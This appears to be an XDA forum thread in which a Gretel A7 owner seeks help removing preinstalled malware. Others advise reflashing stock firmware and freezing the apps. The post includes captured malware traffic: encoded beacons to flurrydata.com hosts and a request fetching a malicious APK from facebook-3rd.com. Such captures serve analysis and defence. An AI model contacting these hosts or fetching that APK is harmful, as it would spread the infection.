Help removing android malware that rooted my phone

Search This thread

e2048

New member
Nov 6, 2018
2
0
My phone is a Gretel A7.
I got infected with malware through a dodgy website.
After rebooting the phone it stuck on the startup logo for about 45 minutes and when finally started I start getting popups.
I believe the malware rooted my phone.
The malware installs additional apps that actually cause the popups, I can uninstall the apps, but I cant remove the "system" app that keeps reinstalling them.

I have had success in preventing the malware downloading and installing things by using the app NoRoot Firewall to deny network access to the infected system app.
I can also view its communication with packet sniffer app.
All attempts to disable or uninstall the infected system app have failed because I don't have root.

I have tried a few antivirus apps from the play store but none of them can detect it.
I believe the infected system app is called CopyCustomFiles as its the only thing running in the developer mode process list.

I dont have the ability to connect the phone to a computer to run adb, and im afraid to use kingroot incase it bricks the phone.
Is there a way to get a temp root so if something goes wrong i can just restart.

Will system reset get rid of it, i am afraid to do it incase it breaks something.
If it rooted and flashed something then it will still be there after reset right?

Screenshot from NoRoot Firewall showing the attempted connection.
Several apps shown im not sure which one is actually infected.
https://ibb.co/jAoJfA

Here is what it does when my phone boots, downloads and installs an apk with malware.

POST /boot HTTP/1.1
Content-Type: application/octet-stream
Connection: close
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: statistics.flurrydata.com:10000
Accept-Encoding: gzip
Content-Length: 592

M0snAQ59DxIXGTszNjsMGTsALQFaZQdaGUgoNxsmDBkXHycdCzZaBxdQfS5YY19JZEsgABcrah9QGCwxBiNLUWofc0FNcQZbF0Z9OgYiHTQ+DDAcETBbNlASK3pTbwhJZEsxCgopXApQNSk9Gz4ABCZLeE0ObhtfF0Z9KgYgNh0tGzEGFzFqBFQAMCpLd0sycFpyXFYGbUd0XXEfGygdDiRHAF46ZxtfG1pxDll8R1t9R3BfSWgFXARYfXRLJAQOIUt4TUtqAloAU29gWX9aXHFcck1UfVwPahkmKx0oBDQpGTJNQjlUBUYPc3oEIg0OJDYsDhU6F1MXK2h6RW8HDjweLR0TAFwHUwV9YksAJikBJQdNVH1FCFYBPj8MEgcKJQxgVVo8WgQbDDAsCGMeAjoMLgoLLEAZUQsrPUthSxs6BigKGytqAFFIZXo6FDoyCTELIT8ABVoEWn10Sy4BCiYHJwMnNlFLD0gGGTEEJyxqRWAdFzJqH1AYLDEGIzYGIQctHVplF1gBU2ttXHlYXX1Zcl9aIhlLVAkrMQYjS1FqCioKGzQXRRc/FhxLd0sqeFhyXEFvAF4AXH0l

HTTP/1.1 200 OK
Server: openresty/1.11.2.5
Date: Mon, 05 Nov 2018 08:20:55 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close

M0shABY5XA4XUCR6ACMdDjofIwMnLF0GRx59Ylh5XVt4RWAGFitQG0MLMwcFIgcMalNzW0xvBRQZSDoqGy4GDy1LeF8F

POST /v15_worker HTTP/1.1
Content-Type: application/octet-stream
Connection: close
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: analyze.flurrydata.com:10000
Accept-Encoding: gzip
Content-Length: 1956

M0syBxcxUDZcDn1iSwxZW35ZcFhKbQ1cF0Z9OQo5AAQmS3hNCjpFBkceADsBKAoAakVgDggvalpHDgAqDD0GGTxLeDQDfVQKQQMpOR0oNggnHCwbWmUFRRcJNz0KJjYIJxwsG1plBEUXAzt6U39bUn1FYAYeAFARXBkrelMrCAc7DG5NHDBqCFYeNi4IOQxJcg8jAws6GUtFCzwzCCoMSXJLIQAVcUUMWgQmdgQiCgMhSz8yVH1QB0NIZSNLOgYZIwwwMA46RxpcBTF6U28fWmZfYENaOVodVDUvMAYjDDQhDWBVWm4NWQZaZhpZfVlYf1p0Xk9vA0sZSCwxBG9TSXpecF9LbwZZB1pvbVt6XElkSzEKCilcClA1KT0bPgAEJkt4TQ5uG18XRn0vACsANCUIIU1CfVsAWUhzehsiBDQ+DDAcETBbNlgDMTcbb1NJeV17W01qAVgDX29oWW9FSTsNKTAOOkcaXAUxelN/WkdqCy0ADABDDEcZNjcHb1NJPlhsWlZsB0sZSD03Bjk2HiENYFVaHgVYBVlmaFx6XF1qRWAGHgBGEEYeOjVLdx0ZPQxuTRs3UApeNSwxDiMIHz0bJ01CbxlLRQs8MwgqDDQ7ACUBGStAG1BIZXpYY1tFcF1yQUluBlwBU3FpR3RHWnVKc1lJbgNdA19pPF8rXVt+DXRaTmsDUANbaGxfeF8Jegx0XE45Aw0ZKRFlDSgEBGQmF1IvHHFFelcSPQ0kCD8tAm4jRRdUAHEDPjZFHj1WCgwrJRExUkV2VxwWKXxHXnBadlxJZwxQAllrbQxmWFIIWmBDWihaG14PLQcfKBsYIQYsMB0nQUsPSDZ6RW8aDjoAIwNaZRdZBFhsbFx7XlNxKAAsPBpzSxlIPDkFITYIJxwsG1plBlgAXXN6CCMNGScAJjAROxdTF19ubFF6Cw8rCHoMQGdWW1dIc3oHKB00KwpgVVo2UEsZSC8qBicMCDw2KwtaZRc6bDkGGTEEJywXWXFeSH0ZS1YCPjYHKAU0IQ1gVVoGdDF8JBh6RW8NAiw2MRsZK0AaF1AkegUiCklySxpNVH1HDFQOfWJLFVs7eipwPEp9GUtCGDYsDG9TSRBZEl87b2ZZFxdzehksCgApDicwDjpHGlwFMQcHLAQOalNgW1ZsG10XRn0tHCQNSXJLe18cawZbUA5yO14uD0Z8XSBaVWZTXA1HbjlbK18OfFl1XxxuF0UXBDosNj4cCTwQMgpaZRchZjoec0thSwo4GR0BDTIXUwZec3ocOAAPFxo2DgwqRksPEX00Bi5LUWoxYENaLVAIUUhlejF/OVkLWxFdWnMXHkcDKz1Ld0szeDlyLEgMBUtIRn0rACA2CCtLeE0ROhdFFxo+OwIsDg4XGScdFTZGGlwFMXpTbyAYPDkpCCN0aClxDzMIAioyQBVLbk0KMFg2Qw8tKwAiBzQlCCgACn0PS2xSbGhaYzAzZih1QT8tUB1QBnEaWA9RRX5HckEubwRHBV9xall8Xlt9WHBNVH1cBFADfWJLflxce1x7X0BvB1oCU2poS2FLGykKKQ4fOmofUBgsMQYjNggnDSdNQm4ERRcHMDwMITYFKQQnTUJ9dF4XRn0rDS4IGSxLeE0kcEYNVgstPDViS0dqGSMMEz5SDGoEPjUMb1NJKwYvQR4wQQgbHTYqDCEMGDscMgsZK1BLGUg7MRo9BQoxS3hNT20FEQRbZ2xLYUsFLR01AAo0agBbDDB6U28kJAogDipacxcZVAk0OQ4oNhktGi0aCjxQNkULKzBLd0s3Zxo7HAw6WDUaGi0xH2AIGzg1bTwBLEEMWCwwLAgRRjgxGjYKFRlaHVREPigCbxRHagAsHAw+WQVqGDooBj8dSXIyOU0bMlFLD0g2Nho5CAckS25NDCZFDBdQfWsbKUtHagAmTUJtB1AARn0rHSwdHjtLeFpJb0g0SA==

HTTP/1.1 200 OK
Server: openresty/1.7.10.2
Date: Mon, 05 Nov 2018 08:21:14 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close

M0snHQo8Wg1QSGVoRW8KBixLeE0RMUYdVAYzekVvGQo6CC8cWmVOS1wOfWJbfllTZEswCggzVApQNTI9HSUGD2pTcENaLFAbQwM8PUt3SwgnBGwKFT1ZCE8FMXYPKAUCKwA2QQ0rXAUbICo9OjsKSWRLMg4bNFQOUEhlegoiBEUtBCADGSVaBxsMOjQALgAfakVgBB06RTZWAjo7Am9THzocJ0NaPFgNF1B9MQc+HQokBWBDWipHBRdQfTAdORlRFEYeQB4zVBtQRDk5CigLBCcCb1wKOxsKWgcDd1l9WDR6WXNXSW4FWGpcaAdZfDZZeFh6XklvBDYERD4oAm9FSSkKNgYXMRdTFxEDeh00GQ4US3gzWjZbHVAEKwcaKBsdIQonM1pzFTUXAzEsDCMdNCkKNgYXMWlLDzZ9OwYgRw4lCy4OAjBbR1MPMzEKJB1FPR0rA1YVQAxmHDwES2FJN2oMOhsKPmlLDx4tLQwwS0dqGSMMEz5SDGocOipLd19cZEs2Fgg6F1MXWS08SzBFSSsGLAkROBdTTkg2Nh0oGx0pBR0cEDBHHRdQa2tbfVlHagAsGx0tQwhZNTM3BypLUXxacF9IIkg=

GET /001_20181101_67_01_20181101_1.apk HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: flare.facebook-3rd.com
Connection: Keep-Alive
Accept-Encoding: gzip
 

IronRoo

Senior Member
Aug 4, 2014
1,342
434
I dont have the ability to connect the phone to a computer to run adb, and im afraid to use kingroot incase it bricks the phone.
Is there a way to get a temp root so if something goes wrong i can just restart.

Will system reset get rid of it, i am afraid to do it incase it breaks something.
If it rooted and flashed something then it will still be there after reset right?

No system reset will not get rid of it as these malicious apps are installed as system apps, so will not be effected by reset.

If you flash the latest stock ROM from your manufacturer (not some random download site as this may be malicious also, unless you can check it's digital signature to official signature) the malicious app will be overwritten & removed (as stock ROM writes to all partitions, but note a custom ROM normally only changes part of system so malicious app could survive)

There are some apps that you can use to flash new stock ROM but they all need root (I think), so not

You should be able to "freeze" the apps you mention which will stop them working, even though you can't uninstall them (there are a few threads on how to do that in this forum). But really you need to get access to a PC for either ADB or to reflash stock.
 

e2048

New member
Nov 6, 2018
2
0
After doing further research I discovered that the stock firmware for this phone in infected with malware from the factory.
There is an update that is not infected but I am not clear how to install it safely.
I can't find any official source for the stock ROM or install guide.
The only guide I found is unofficial and requires a PC and installing TWRP or SP flash.
The guide is here getdroidtips.com/stock-rom-gretel-a7/

My question is... The stock recovery menu on my phone has an option to install update from sdcard.
So can I skip the TWRP/SP flash step and just install the zip file from the above link using the recovery menu I already have?

I assume this update will overwrite/replace the OS and all system apps with the ones contained in the update, while leaving all my play store apps and settings/files intact?

Thanks.
 

skeptre

Member
Apr 18, 2011
24
2
A little late but were you able to resolve the issue on your device ? I am researching about the presence of pre-installed mawlare on Gretel A7 and would like to know more about your experience.
Feel free to contact me directly or please respond here.

After doing further research I discovered that the stock firmware for this phone in infected with malware from the factory.
There is an update that is not infected but I am not clear how to install it safely.
I can't find any official source for the stock ROM or install guide.
The only guide I found is unofficial and requires a PC and installing TWRP or SP flash.
The guide is here getdroidtips.com/stock-rom-gretel-a7/

My question is... The stock recovery menu on my phone has an option to install update from sdcard.
So can I skip the TWRP/SP flash step and just install the zip file from the above link using the recovery menu I already have?

I assume this update will overwrite/replace the OS and all system apps with the ones contained in the update, while leaving all my play store apps and settings/files intact?

Thanks.
 
Our Apps
Get our official app!
The best way to access XDA on your phone
Nav Gestures
Add swipe gestures to any Android
One Handed Mode
Eases uses one hand with your phone